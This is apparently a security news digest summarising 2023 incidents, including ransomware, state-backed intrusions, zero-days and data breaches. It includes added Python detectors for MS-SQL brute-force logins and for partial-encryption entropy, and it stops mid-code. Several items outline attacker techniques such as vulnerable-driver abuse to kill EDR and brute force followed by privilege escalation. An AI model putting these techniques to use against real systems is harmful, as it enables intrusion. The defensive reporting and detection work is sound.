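
    The browsing traffic to www.news.example passes the volume and span filters but fails the regularity test, because human lookups cluster in bursts; the beacon passes all four. Grouping by registered domain rather than full name matters because a beacon typically varies the leftmost label on every query.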

    CISA Adds MinIO, PaperCut, and Chrome Bugs to Its Known Exploited Vulnerabilities Catalog

    Under Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies must address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. Experts also recommend that private organizations review the catalog and address the listed vulnerabilities in their own infrastructure.

    New All-in-One "EvilExtractor" Stealer for Windows Systems Surfaces on the Dark Web

    A new "all-in-one" stealer malware named EvilExtractor (also spelled Evil Extractor) is being marketed for sale to other threat actors to steal data and files from Windows systems. "It includes several modules that all work via an FTP service," Fortinet FortiGuard Labs researcher Cara Lin said. "It also contains environment checking and Anti-VM functions. Its primary purpose seems to be to steal browser data and information from compromised endpoints and then upload it to the attacker's FTP server."

    APC Warns of Critical Unauthenticated RCE Flaws in UPS Software

    APC's Easy UPS Online Monitoring Software is vulnerable to unauthenticated arbitrary remote code execution, allowing hackers to take over devices and, in a worst-case scenario, disable their functionality altogether. Uninterruptible Power Supply (UPS) devices are vital in safeguarding data centers, server farms, and smaller network infrastructures by ensuring seamless operation amid power fluctuations or outages. APC (by Schneider Electric) is one of the most popular UPS brands.

    Lazarus Hackers Now Push Linux Malware via Fake Job Offers

    Researchers have uncovered a fresh Lazarus campaign, known as "Operation DreamJob", that has set its sights on Linux users with malware. This marks the first time Linux users have been targeted by this campaign. Researchers noted that this discovery has given them a high level of confidence that Lazarus was responsible for the recent supply-chain attack on VoIP provider 3CX. Multiple companies were compromised in March 2023 when they used a trojanized version of the 3CX client, which contained information-stealing trojans.

    VMware Fixes vRealize Bug That Let Attackers Run Code as Root

    VMware recently patched a critical vulnerability that could enable remote attackers to gain code execution as root on vulnerable appliances. Tracked as CVE-2023-20864, the flaw impacts VMware Aria Operations for Logs (formerly vRealize Log Insight), a log analysis tool used to manage terabytes' worth of application and infrastructure logs in large-scale environments.

    Cisco Industrial Network Director Vulnerabilities

    This week, Cisco addressed several flaws impacting its Industrial Network Director (IND), which is designed to help "operations teams gain full visibility of network and automation devices in the context of the automation process and provides improved system availability and performance, leading to increased overall equipment effectiveness." The most severe of the flaws is CVE-2023-20036, a critical (CVSS 9.9) command injection vulnerability in the web UI of Cisco IND that could allow an authenticated remote attacker to execute arbitrary commands with administrative privileges on the underlying operating system of an affected device.

    American Bar Association Data Breach Hits 1.4 Million Members

    The American Bar Association (ABA) has suffered a data breach after hackers compromised its network and gained access to older credentials for 1,466,000 members. The ABA is the largest association of lawyers and legal professionals globally, with 166,000 members as of 2022. The organization provides continuing education and services for lawyers and judges, as well as initiatives to improve the legal system in the USA.

    Cyber Experts Predict More Harmful Cyberattacks in Ukraine

    Ukraine should brace for more Russian wiper and ransomware attacks, concluded a panel of cyber threat intel experts and government officials in a report assessing the cyber dimensions of Moscow's ongoing war of conquest against its European neighbor. The report, commissioned by the U.K. National Cyber Security Center, finds the tempo of destructive cyberattacks has ebbed and flowed across the first year of the Russian invasion.

    Ransomware Gangs Abuse Process Explorer Driver to Kill Security Software

    AuKill, a newly discovered hacking tool, is being used by threat actors to disable Endpoint Detection and Response (EDR) software on targeted systems in preparation for the deployment of backdoors and ransomware, in what is known as a Bring Your Own Vulnerable Driver (BYOVD) attack. In such attacks, the perpetrators drop a legitimate driver, signed with a valid certificate and able to run with kernel privileges, onto the victim's device; in this case it is a vulnerable version of the Process Explorer driver. Abusing the driver allows them to disable security solutions and take control of the system.

    North Korean Hackers Chained Supply Chain Hacks to Reach 3CX

    Mandiant investigators hired by 3CX now say the source of the infection was a decommissioned but still downloadable trading software package called X_Trader, made by Chicago-based Trading Technologies. A 3CX employee downloaded the trading package, said Charles Carmakal, Mandiant chief technology officer, during a Wednesday afternoon press briefing.

    Google TAG Warns of Russian Hackers Conducting Phishing Attacks in Ukraine

    Elite hackers associated with Russia's military intelligence service have been linked to large-volume phishing campaigns aimed at hundreds of users in Ukraine to extract intelligence and influence public discourse related to the war. Google's Threat Analysis Group (TAG), which is monitoring the activities of the actor under the name FROZENLAKE, said the attacks continue the "group's 2022 focus on targeting webmail users in Eastern Europe." The state-sponsored cyber actor, also tracked as APT28, Fancy Bear, Forest Blizzard, Iron Twilight, Sednit, and Sofacy, is both highly active and proficient. It has been active since at least 2009, targeting media, governments, and military entities for espionage.

    Microsoft SQL Servers Hacked to Deploy Trigona Ransomware

    Attackers are hacking into poorly secured and Internet-exposed Microsoft SQL (MS-SQL) servers to deploy Trigona ransomware payloads and encrypt all files. The MS-SQL servers are being breached via brute-force or dictionary attacks that take advantage of easy-to-guess account credentials. After connecting to a server, the threat actors deploy malware dubbed CLR Shell by security researchers from South Korean cybersecurity firm AhnLab, who spotted the attacks. This malware is used for harvesting system information, altering the compromised account's configuration, and escalating privileges to LocalSystem by exploiting a vulnerability in the Windows Secondary Logon Service (which is required to launch the ransomware as a service). In the next stage, the attackers install and launch a dropper malware as the svcservice[.]exe service, which they use to launch the Trigona ransomware as svchost[.]exe.
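    As an added detection example (not code from AhnLab or the page), the Python below reads SQL Server ERRORLOG-style "Login failed" and "Login succeeded" lines, flags a client address that exceeds a failure threshold inside a sliding window, and then flags any later successful login from that same address, which is the brute-force-then-access sequence described above. The log lines are constructed in the style of the ERRORLOG login-audit format and are not real data; the later CLR Shell and privilege-escalation stages are not modelled.

```python
"""Detect MS-SQL credential brute force followed by a successful login.

Added example; not from AhnLab or the page. Lines below are constructed in
the style of SQL Server's ERRORLOG login auditing; they are not real data.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_ERRORLOG = """\
2023-04-17 03:12:45.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2023-04-17 03:12:46.01 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2023-04-17 03:12:47.33 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2023-04-17 03:12:48.02 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.7]
2023-04-17 03:12:49.57 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2023-04-17 03:12:50.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2023-04-17 03:12:55.40 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.7]
2023-04-17 08:01:10.33 Logon       Login failed for user 'reports'. Reason: Password did not match that for the login provided. [CLIENT: 10.1.2.3]
2023-04-17 08:01:30.02 Logon       Login succeeded for user 'reports'. Connection made using SQL Server authentication. [CLIENT: 10.1.2.3]
"""

_PREFIX = r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ Logon\s+"
FAIL_RE = re.compile(
    _PREFIX + r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]")
OK_RE = re.compile(
    _PREFIX + r"Login succeeded for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]")


def analyze_errorlog(text, threshold=5, window_s=60):
    """Count failures per client IP in a sliding window; once an IP crosses
    the threshold, report it and any subsequent successful login from it."""
    recent = defaultdict(deque)   # ip -> timestamps of failures in window
    flagged = {}                  # ip -> time it crossed the threshold
    brute_force = []
    suspicious = []
    for line in text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            q = recent[m["ip"]]
            q.append(ts)
            # Drop failures older than the window (q is never empty here).
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold and m["ip"] not in flagged:
                flagged[m["ip"]] = ts
                brute_force.append({"ip": m["ip"], "failures": len(q),
                                    "at": ts.isoformat()})
            continue
        m = OK_RE.match(line)
        if m and m["ip"] in flagged:
            suspicious.append({"ip": m["ip"], "user": m["user"], "at": m["ts"]})
    return {"brute_force": brute_force, "success_after_brute_force": suspicious}


if __name__ == "__main__":
    print(analyze_errorlog(SAMPLE_ERRORLOG))
```

    The single mistyped password from 10.1.2.3 followed by a success is ignored, while the burst from 203.0.113.7 is reported at the fifth failure and its later success for 'sa' is surfaced as the event to investigate. Successful-login lines only appear when login auditing is set to record both failed and successful logins, so check that setting before relying on the second rule.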

    Recycled Network Devices Exposing Corporate Secrets

    Over half (56%) of corporate network devices sold second-hand still contain sensitive company data, according to a new study from ESET. The security vendor bought 16 recycled routers and found that nine of them contained one or more IPsec or VPN credentials, or hashed root passwords, as well as enough information to identify the previous owner.

    Microsoft: Iranian Hackers Behind Retaliatory Cyberattacks on US Orgs

    According to a recent report from Microsoft's Threat Intelligence team, Mint Sandstorm, a hacking group previously known as Phosphorus and believed to have ties to the Iranian government and the Islamic Revolutionary Guard Corps (IRGC), has shifted its focus from surveillance to direct attacks on critical infrastructure in the United States. The report states that a specific subgroup of Mint Sandstorm is responsible for this change in tactics. The new subgroup typically exploits newly publicized proof-of-concept exploits.

    TLP:GREEN - PWNYOURHOME, FINDMYPWN, LATENTIMAGE: 3 iOS Zero-Click exploits used by NSO Group in 2022

    A new report from Citizen Lab states that the Israeli surveillance firm NSO Group used at least three zero-click zero-day exploits to deliver its Pegasus spyware. In 2022, the Citizen Lab analyzed the NSO Group activity after finding evidence of attacks on members of Mexico’s civil society, including two human rights defenders from Centro PRODH, which represents victims of military abuses in Mexico.

    Play Ransomware Gang Uses Custom Shadow Volume Copy Data-Theft Tool

    The Play ransomware group has developed two custom tools in .NET, namely Grixba and VSS Copying Tool, which it uses to improve the effectiveness of its cyberattacks. Grixba is a network-scanning and information-stealing tool used to enumerate users and computers in a domain. When performing the scan function, Grixba will check for anti-virus and security programs, EDR suites, backup tools, and remote administration tools. Also, the scanner checks for common office applications and DirectX, potentially to determine the type of computer being scanned.

    Google Patches Another Actively Exploited Chrome Zero-Day

    On Tuesday, Google released security updates to address a high-severity vulnerability in the Chrome browser. Tracked as CVE-2023-2136, the flaw is related to an integer overflow vulnerability in Skia, a Google-owned open-source multi-platform 2D graphics library written in C++. For its part, Skia is a key component of Chrome’s rendering pipeline as it provides the browser a set of APIs for rendering graphics, text, shapes, images, and animations.

    US, UK Warn of Govt Hackers Using Custom Malware on Cisco Routers

    The US, UK, and Cisco are warning of Russian state-sponsored APT28 hackers deploying a custom malware named 'Jaguar Tooth' on Cisco IOS routers, allowing unauthenticated access to the device. APT28, also known as Fancy Bear, STRONTIUM, Sednit, and Sofacy, is a state-sponsored hacking group linked to Russia's General Staff Main Intelligence Directorate (GRU).

    AI Tools Like ChatGPT Expected to Fuel BEC Attacks

    Across all BEC attacks seen over the past year, 57% relied on language as the main attack vector to get them in front of unsuspecting employees, according to Armorblox. In other trends to watch, vendor compromise and fraud are rising as a new attack vector and graymail is wasting 27 hours of time for security teams each week. The report is based on data gathered across more than 58,000 customer tenants, analyzing over 4 billion emails and stopping 800,000 threats every month. SMBs are particularly vulnerable to vendor fraud and supply chain email attacks.

    Ex-Conti Members and FIN7 Devs Team Up to Push New Domino Malware

    Former members of the Conti ransomware group have collaborated with FIN7 threat actors to spread a new malware family called "Domino" against corporate networks. The Domino malware has two parts: the Domino Backdoor and the Domino Loader. The backdoor is responsible for dropping the Domino Loader, which then injects a malicious DLL into the memory of another process to extract confidential information.

    APT41 Abuses Google Command and Control Red Team Tool in Attacks

    The Chinese state-sponsored hacking group APT41 was found abusing the GC2 (Google Command and Control) red teaming tool in data theft attacks against a Taiwanese media company and an Italian job search company. APT41 is known to target a wide range of industries in the USA, Asia, and Europe. Mandiant has been tracking the group since 2014, saying its activities overlap with other known Chinese hacking groups, such as BARIUM and Winnti.

    Vice Society Gang is Using a Custom PowerShell Tool for Data Exfiltration

    Palo Alto Networks' Unit 42 team observed the Vice Society ransomware gang exfiltrating data from a victim network using a custom-built Microsoft PowerShell (PS) script. The threat actors use the PowerShell tool to evade software-based and human-based detection. Because PowerShell scripting is common in a typical Windows environment, a PowerShell-based tool lets threat actors hide in plain sight and get their code executed without raising suspicion.

    Hackers Start Abusing Action1 RMM in Ransomware Attacks

    Researchers caution that hackers are increasingly using the Action1 remote access software to maintain their presence on breached networks and execute commands, scripts, and binaries. Action1 is typically employed by managed service providers (MSPs) and businesses to remotely monitor and manage endpoints on a network. Although remote access tools are highly beneficial for system administrators, they are also valuable to threat actors, who can abuse them to establish persistence on networks or distribute malware.

    Italy Bans ChatGPT Over Data Privacy Concerns

    In a move that one Italian minister has called "disproportionate", Italy has temporarily banned ChatGPT over concerns that it violates the General Data Protection Regulation (GDPR), the data protection law that imposes security and privacy obligations on those operating within the European Union (EU) and the European Economic Area (EEA). The Italian data protection agency, Garante per la Protezione dei Dati Personali (also known as Garante), cited an "absence of any legal basis that justifies the massive collection and storage of personal data" to "train" ChatGPT, and also accused OpenAI of failing to verify the age of ChatGPT users. Italy's ban has led privacy regulators in Ireland and France to contact Garante to find out more about the decision.

    LockBit Ransomware Encryptors Found Targeting Mac Devices

    The LockBit ransomware gang has created encryptors targeting Macs for the first time, likely becoming the first major ransomware operation to specifically target macOS. The new encryptors were discovered by cybersecurity researcher MalwareHunterTeam, who found a ZIP archive on VirusTotal containing what appears to be most of the available LockBit encryptors. Historically, the LockBit operation has used encryptors designed for attacks on Windows, Linux, and VMware ESXi servers. However, this archive also contained previously unknown encryptors for macOS, ARM, FreeBSD, MIPS, and SPARC CPUs.

    Google Chrome Emergency Update Fixes First Zero-Day of 2023

    On Friday, Google released security updates to address a high-severity zero-day in the Chrome web browser. Tracked as CVE-2023-2033, the vulnerability is a type confusion bug in the Chrome V8 JavaScript engine. "Although type confusion flaws would generally allow attackers to trigger browser crashes after successful exploitation by reading or writing memory out of buffer bounds, threat actors can also exploit them for arbitrary code execution on compromised devices" (Bleeping Computer, 2023). To address CVE-2023-2033, Google has released Chrome version 112.0.5615.121. Users have been advised to upgrade to the latest version as soon as possible.

    Over 20,000 Iowa Medicaid Members Affected By Data Breach

    Between June 30 and July 5, 2022, a cyber attack on the computer systems of a contractor exposed the personal information of 20,800 Iowans who are Medicaid recipients. The contractor, Telligen, had subcontracted part of its work to Independent Living Systems, which was the organization targeted in the attack. The attack did not affect the Iowa Medicaid system itself.

    Severe Android and Novi Survey Vulnerabilities Under Active Exploitation

    CISA recently added two vulnerabilities (CVE-2023-20963 and CVE-2023-29492) to its catalog of known exploited flaws. CVE-2023-20963 is a privilege escalation vulnerability in the Android Framework; Ars Technica reported last month that Android applications signed by Chinese e-commerce company Pinduoduo weaponized the flaw to compromise devices and siphon sensitive data. The second flaw, CVE-2023-29492, affects the Novi Survey software.

    Microsoft: Phishing Attack Targets Accountants as Tax Day Approaches

    Microsoft is warning of a phishing campaign targeting accounting firms and tax preparers with remote access malware that provides initial access to corporate networks. With the USA reaching the end of its annual tax season, accountants are scrambling to gather clients' tax documents to complete and file their returns, which makes this an ideal time for threat actors to target tax preparers.

    Hikvision Fixed a Critical Flaw in Hybrid SAN and Cluster Storage Products

    Chinese video surveillance giant Hikvision addressed an access control vulnerability, tracked as CVE-2023-28808, affecting its Hybrid SAN and cluster storage products. An attacker with network access to the device can exploit the issue to obtain admin permission. The attacker can exploit the vulnerability by sending crafted messages to vulnerable devices.

    RTM Locker, A New RaaS, Gains Notoriety in the Threat Landscape

    Researchers from cybersecurity firm Trellix have detailed the tactics, techniques, and procedures of an emerging cybercriminal gang called "Read The Manual" (RTM) Locker. The group runs a ransomware-as-a-service (RaaS) operation and provides its malicious code to a network of affiliates while imposing strict rules on them. The group aims to fly below the radar and, like other groups, does not target systems in the CIS region.

    Lazarus Group's DeathNote Campaign Reveals Shift in Targets

    The Lazarus Group, a notorious hacking group believed to be based in North Korea, has been observed conducting a new cyber espionage campaign called DeathNote, targeting defense and government organizations in South Korea and Russia. Kaspersky's senior security researcher, Seongsu Park, has been tracking the campaign, also known as Operation DreamJob or NukeSped, since 2019. The Lazarus Group initially used decoy documents related to cryptocurrency, such as questionnaires about buying crypto, to distribute malware. However, in April 2020, Kaspersky found a shift in targets and infection vectors.

    Fortinet Fixed a Critical Vulnerability in Its Data Analytics Product

    Fortinet has addressed a critical vulnerability, tracked as CVE-2022-41331 (a CVSS score of 9.3), in its Fortinet FortiPresence data analytics solution. FortiPresence is a comprehensive data analytics solution designed for analyzing user traffic and deriving usage patterns. Successful exploitation can lead to remote, unauthenticated access to Redis and MongoDB instances via crafted authentication requests.

    Russian Hackers Linked to Widespread Attacks Targeting NATO and EU

    Poland's Military Counterintelligence Service and its Computer Emergency Response Team have linked APT29 state-sponsored hackers, part of the Russian government's Foreign Intelligence Service (SVR), to widespread attacks targeting NATO and European Union countries. As part of this campaign, the cyberespionage group (also tracked as Cozy Bear and Nobelium) aimed to harvest information from diplomatic entities and foreign ministries.

    Windows Admins Warned to Patch Critical MSMQ QueueJumper Bug

    Security researchers and experts warn of a critical vulnerability in the Windows Message Queuing (MSMQ) middleware service patched by Microsoft during this month's Patch Tuesday and exposing hundreds of thousands of systems to attacks. MSMQ is available on all Windows operating systems as an optional component that provides apps with network communication capabilities with "guaranteed message delivery," and it can be enabled via PowerShell or the Control Panel.

    Hyundai Data Breach Exposes Owner Details in France and Italy

    Hyundai, a multinational automotive manufacturer, recently disclosed a data breach impacting its Italian and French car owners as well as those who booked a test drive. According to several posts on Twitter, the following data was stolen in the attack:
    E-mail addresses
    Physical addresses
    Telephone numbers
    Vehicle chassis numbers
    Thankfully, Hyundai noted in its notification letter that no financial data or identification numbers were stolen by the hacker who managed to gain access to the company’s database. Since the attack, Hyundai says it has reached out to IT experts to conduct an incident response and to determine the full scope of the impact.

    iPhones Hacked via Invisible Calendar Invites to Drop Quadream Spyware

    Microsoft and Citizen Lab discovered commercial spyware created by an Israel-based company dubbed QuaDream. The spyware, delivered through a zero-click exploit known as ENDOFDAYS, is used to compromise the iPhones of high-risk individuals. According to Citizen Lab, the attackers exploited a zero-day vulnerability affecting iPhones running iOS 14.4 up to 14.4.2 between January 2021 and November 2021, using iCloud calendar invitations that were backdated and therefore invisible to the user. The attacks affected at least five civil society victims in various regions, including journalists, political opposition figures, and an NGO worker. The surveillance malware (dubbed KingsPawn by Microsoft) contains a self-destruct feature that erases its traces from victims' iPhones, and it can record environmental audio and calls.

    Hacked Sites Caught Spreading Malware Via Fake Chrome Updates

    Hackers are compromising websites to inject scripts that display fake Google Chrome automatic update errors that distribute malware to unsuspecting visitors. The campaign has been underway since November 2022, and according to NTT security analyst Rintaro Koike, it shifted up a gear after February 2023, expanding its targeting scope to cover users who speak Japanese, Korean, and Spanish. BleepingComputer has found numerous sites hacked in this malware distribution campaign, including adult sites, blogs, news sites, and online stores.

    Microsoft April 2023 Patch Tuesday fixes 1 zero-day, 97 flaws

    As part of the April Patch Tuesday, Microsoft addressed 97 flaws, including a zero-day vulnerability that is actively being exploited in attacks in the wild. Of the flaws fixed, there were 20 elevation of privilege vulnerabilities, 8 security feature bypass vulnerabilities, 45 remote code execution vulnerabilities, 10 information disclosure vulnerabilities, 9 denial of service vulnerabilities, and 6 spoofing vulnerabilities. Seven of the vulnerabilities are rated critical in severity, and all seven are remote code execution flaws.

    Latitude Financial Refuses to Pay Ransom

    The Australian consumer credit provider said in a Tuesday update on its ongoing ransomware incident that paying the hackers "would not result in the return or destruction of the information that has been stolen." The company continues to experience service disruptions "as we secure our IT platforms," it said. Latitude Financial disclosed late last month that hackers said they stole approximately 7.9 million Australian and New Zealand driver's license numbers and an additional 6.1 million records - including names, addresses, phone numbers and birthdates - from a database containing information dating back to at least 2005. "Latitude will not pay a ransom to criminals," said CEO Bob Belan. The company on March 16 told regulators about the hacking incident, which is under investigation by the Australian Federal Police. Australian Minister of Home Affairs Clare O'Neil called Latitude's decision "consistent with Australian government advice."

    SAP Releases Security Updates for Two Critical-severity Flaws

    Enterprise software vendor SAP has released its April 2023 security updates for several of its products, which include fixes for two critical-severity vulnerabilities that impact the SAP Diagnostics Agent and the SAP BusinessObjects Business Intelligence Platform. In total, SAP has released 24 notes, 19 of which concern new issues of varying importance, and five are updates to previous bulletins.

    A Cyber Attack Hit the Water Controllers for Irrigating Fields in the Jordan Valley

    The irrigation controllers responsible for managing water distribution to fields in the Jordan Valley, operated by the Galil Sewage Corporation, were paralyzed by a cyber attack. These controllers are critical for monitoring the irrigation process as well as wastewater treatment in the region. The company's experts spent the entire day recovering operations, and at this time the source of the attack is still unclear. "The management for both major systems was pushing all of Sunday morning to work through the issue and bring the systems back into full operation," the Jerusalem Post reported.

    KFC, Pizza Hut Owner Discloses Data Breach After Ransomware Attack

    Yum! Brands, the owner of the KFC, Pizza Hut, and Taco Bell fast food chains, is now sending data breach notification letters to an undisclosed number of individuals whose personal information was stolen in a January 13 ransomware attack. This comes after the company previously said that although some data was stolen from its network, it had no evidence that the attackers exfiltrated any customer information.

    SD Worx Shuts Down UK Payroll, HR Services After Cyberattack

    SD Worx, a European HR and payroll management company based in Belgium, recently suffered a cyberattack, forcing it to shut down all of the IT systems for its UK and Ireland services. Due to the attack, the company's UK customer login portal is currently inaccessible. As of this writing, it is unclear what type of attack occurred or how the attackers gained access to SD Worx's systems. SD Worx has already taken measures to isolate impacted systems and is currently investigating the scope of the attack.

    White House Probes Classified Intelligence 'Discord Leaks’

    A tranche of over 100 documents, some marked "Top Secret," appear to have been leaked in multiple batches beginning in January via the Discord messaging service. Apparently unnoticed at the time, the documents subsequently spread via 4Chan, Telegram and Twitter accounts. U.S. officials say the leaked documents may be genuine, although security experts who have reviewed them say some appear to have been doctored, sometimes crudely. The Pentagon has referred the matter to the Department of Justice, which confirmed Sunday that it has launched a criminal investigation into the leaks. Experts say the leaks reveal not just intelligence assessments but also certain capabilities, such as U.S. intelligence visibility into high-level Russian military planning, as well as the activities of the Wagner Group of mercenaries.

    CISA Orders Agencies to Patch Backup Exec Bugs Used by Ransomware Gang

    On April 10, 2023, CISA added five new security issues to its Known Exploited Vulnerabilities catalog, three of them affecting Veritas Backup Exec and used in ransomware attacks. Of the other two, one is a zero-day that was exploited in attacks on Samsung's web browser, while the other allowed attackers to elevate privileges on Windows machines. One of the newly added Veritas vulnerabilities, CVE-2021-27877, is rated critical: it affects the Veritas data protection software and enables remote access and command execution.

    Apple Fixes Two Zero-Days Exploited to Hack iPhones and Macs

    Last Friday, Apple released security updates to address two zero-day vulnerabilities (CVE-2023-28206 and CVE-2023-28205) that were exploited in attacks to compromise iPhones, Macs, and iPads. CVE-2023-28206 is an out-of-bounds write flaw in IOSurfaceAccelerator that can lead to data corruption or a system crash; an attacker can exploit it through a maliciously crafted app to execute arbitrary code with kernel privileges. The second flaw, CVE-2023-28205, is a use-after-free bug in WebKit. It can be exploited by tricking victims into loading malicious web pages under the attacker's control, which can then execute arbitrary code on the targeted system.

    Breached Shutdown Sparks Migration to ARES Data Leak Forums

    A threat group called ARES is gaining notoriety on the cybercrime scene by selling and leaking databases stolen from corporations and public authorities. The actor emerged on Telegram in late 2021 and has been associated with the RansomHouse ransomware operation and the data leak platform, KelvinSecurity, and the network access group Adrastea. ARES Group manages its own site with database leaks and a forum, which may fill the void left by the now defunct Breached forum.

    Microsoft Gets Court Order to Sinkhole Cobalt Strike Traffic

    A common thread in ransomware incidents is hackers' use of the penetration testing tool Cobalt Strike. U.S. federal agencies have issued repeated warnings, particularly to the health sector, to be vigilant for its presence. Google in late 2022 released code allowing antivirus engines to detect it. Now, Cobalt Strike maker Fortra, Microsoft and the Health Information Sharing and Analysis Center have obtained a U.S. federal court order redirecting into sinkhole servers the internet traffic from Cobalt Strike-infected computers sent to command-and-control centers controlled by bad actors. The order affects server internet protocol addresses hosted by data centers across the United States and a slew of malicious domains. "Instead of disrupting the command and control of a malware family, this time we are working with Fortra to remove illegal legacy copies of Cobalt Strike so they can no longer be used by cybercriminals," said Amy Hogan-Burney, general manager of Microsoft's Digital Crimes Unit. A complaint filed in the U.S. District Court for the Eastern District of New York by the three plaintiffs details a history of unlicensed versions of Cobalt Strike being used by hackers to pave the way for ransomware attacks by the likes of LockBit and Conti and its many spinoff groups.

    Iran-linked MERCURY APT Behind Destructive Attacks on Hybrid Environments

    The Microsoft Threat Intelligence team observed a series of destructive attacks on hybrid environments carried out by the MuddyWater APT group (aka MERCURY). The threat actors masqueraded the attacks as a standard ransomware operation (Security Affairs, 2023). MuddyWater has been active since around 2017. In January 2022, U.S. Cyber Command officially linked the Iranian APT group to Iran's Ministry of Intelligence and Security (MOIS).

    US Trauma Centers Hit by KillNet's Recent DDoS Barrage

    US trauma centers have been targeted in a recent distributed denial-of-service (DDoS) campaign by the KillNet group. The attacks flood targeted websites with traffic from botnets, making them inaccessible to legitimate users. Most of the targeted organizations operate one or more Level 1 trauma centers, suggesting that the attackers aimed to disrupt critical care for the most seriously ill and injured patients.

    Medusa Ransomware Claims Attack on Open University of Cyprus

    Medusa ransomware has claimed responsibility for a cyberattack targeting the Open University of Cyprus (OUC). OUC is an online university located in Nicosia, Cyprus, which offers 30 higher-education programs to 4,200 students and participates in various scientific research activities. In a public announcement last week, the university stated that the attack took place on March 27, causing several central and critical services to go offline.

    Sophos Patches Critical Code Execution Vulnerability in Web Security Appliance

    Sophos recently published security updates to address several vulnerabilities in the Sophos Web Appliance, a security solution used by administrators to set web access policies from a single interface. The most severe of the flaws is tracked as CVE-2023-1671 (CVSS score of 9.8) and is a pre-authentication command injection vulnerability in the warn-proceed handler. Successful exploitation could lead to arbitrary code execution.

    Law Enforcement Lures Cybercriminals With Fake DDoS Services

    How many sites the NCA is running and what they offer isn't exactly clear, and that ambiguity is the ploy at the heart of this newly disclosed effort, part of Operation PowerOff. Authorities say it's designed to sow confusion and doubt and undermine trust in the criminal market. Paranoia, they hope, runs deep. Call it an escalation in the never-ending fight against booter sites, which allow individuals with little technical ability to easily commit cybercrimes. "Booter/stresser services are like grass: You can mow the lawn, but the grass will grow back," Daniel Smith, head of research for cybersecurity firm Radware's threat intelligence division, said. "The problem with enforcement is the reaction. As law enforcement worldwide steps up their efforts to reduce crime, the criminals will escalate in lockstep, as there is too much profit involved in cybercrime for everyone to be scared away." Fostering uncertainty among customers is another way to attempt to reduce the proliferation of booter sites.

    Telegram Now the Go-to Place for Selling Phishing Tools and Services

    Telegram has emerged as a preferred platform for phishing bot and kit creators to promote their products and attract unpaid collaborators. The messaging platform has been used for cybercriminal activity for several years, and threat actors in the phishing business are increasingly depending on it for their operations. Researchers at the cybersecurity firm Kaspersky have noted a surge in the popularity of phishing on Telegram, with a growing community of actors offering services, advice, and free instructions for newcomers. This active community of phishing actors on Telegram is involved in every stage of the illicit trade.

    Money Message Ransomware Gang Claims MSI breach, Demands $4 Million

    Taiwanese PC parts maker MSI (Micro-Star International) has been listed on the extortion portal of a new ransomware gang known as "Money Message," which claims to have stolen source code from the company's network. MSI is a global hardware giant that makes motherboards, graphics cards, desktops, laptops, servers, industrial systems, PC peripherals, and infotainment products, with an annual revenue that surpasses $6.5 billion. The threat actor has listed MSI on its data leak website and posted screenshots of what they claim to be the hardware vendor's CTMS and ERP databases and files containing software source code, private keys, and BIOS firmware. Money Message now threatens to publish all these allegedly stolen documents in about five days unless MSI meets its ransom payment demands.

    Typhon Reborn Stealer Malware Resurfaces with Advanced Evasion Techniques

    Authors behind Typhon Reborn recently updated the information stealing malware, coming out with version 2, which features defense evasion capabilities. First documented by Cyble in August 2022, Typhon is capable of hijacking clipboard content, capturing screenshots, logging keystrokes, and stealing data from crypto wallet, messaging, FTP, VPN, browser, and gaming apps. According to researchers, the latest version features increased anti-analysis techniques and an improved stealer and file grabber.

    Nexx Bugs Allow Attackers to Open Garage Doors and Take Control of Alarms and Plugs

    Researchers have found multiple vulnerabilities in Nexx smart devices which can be exploited to open garage doors, disable home alarms, and control smart plugs. Five security issues of varying severity have been publicly disclosed; the vendor has yet to acknowledge or fix them. Most concerning is the use of universal credentials hardcoded into the device firmware. Researchers say these credentials can easily be obtained from the client's communication with Nexx's API. The issue can also be exploited to enumerate Nexx users, allowing an attacker to collect email addresses, device IDs, and first names.

    Police Seize Hacker Bazaar Genesis Market

    U.S. authorities say Genesis Market since 2018 has offered access to more than 1.5 million compromised computers around the world containing more than 80 million account credentials. For sale on the site weren't just username and password combinations but device fingerprints including browser cookies and system information that allowed hackers to bypass security measures such as multifactor authentication.

    ALPHV Ransomware Exploits Veritas Backup Exec Bugs for Initial Access

    Researchers observed an affiliate of ALPHV exploiting three vulnerabilities in Veritas Backup products to gain initial access to target networks. The ALPHV ransomware group was founded in December 2021 and is believed to be run by former members of the Darkside and Blackmatter ransomware groups who shut down their operations to avoid law enforcement pressure.

    New Rorschach Ransomware Is the Fastest Encryptor Seen So Far

    Security researchers at Check Point uncovered a new ransomware strain, dubbed Rorschach, that encrypts faster than any strain seen so far. "The encryption scheme blends the curve25519 and eSTREAM cipher hc-128 algorithms and follows the intermittent encryption trend, meaning that it encrypts the files only partially, lending it increased processing speed."
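    Intermittent encryption is fast precisely because it leaves most of each file untouched, and that is also what makes it visible: a fully encrypted file is uniformly high-entropy, while a partially encrypted one alternates between high-entropy (encrypted) and low-entropy (untouched) regions. The following is an added example, not code from Check Point or from the Rorschach sample, that profiles per-chunk Shannon entropy and classifies a file accordingly. The 4 KiB window, the two thresholds and the sample "document" are assumptions, and the partial-encryption simulator only builds test input (it is not the Rorschach scheme).

```python
"""Per-chunk entropy profiling to spot intermittent (partial) file encryption.
Added example; thresholds, chunk size and sample data are assumptions."""
import math
from collections import Counter

CHUNK_SIZE = 4096     # assumed analysis window
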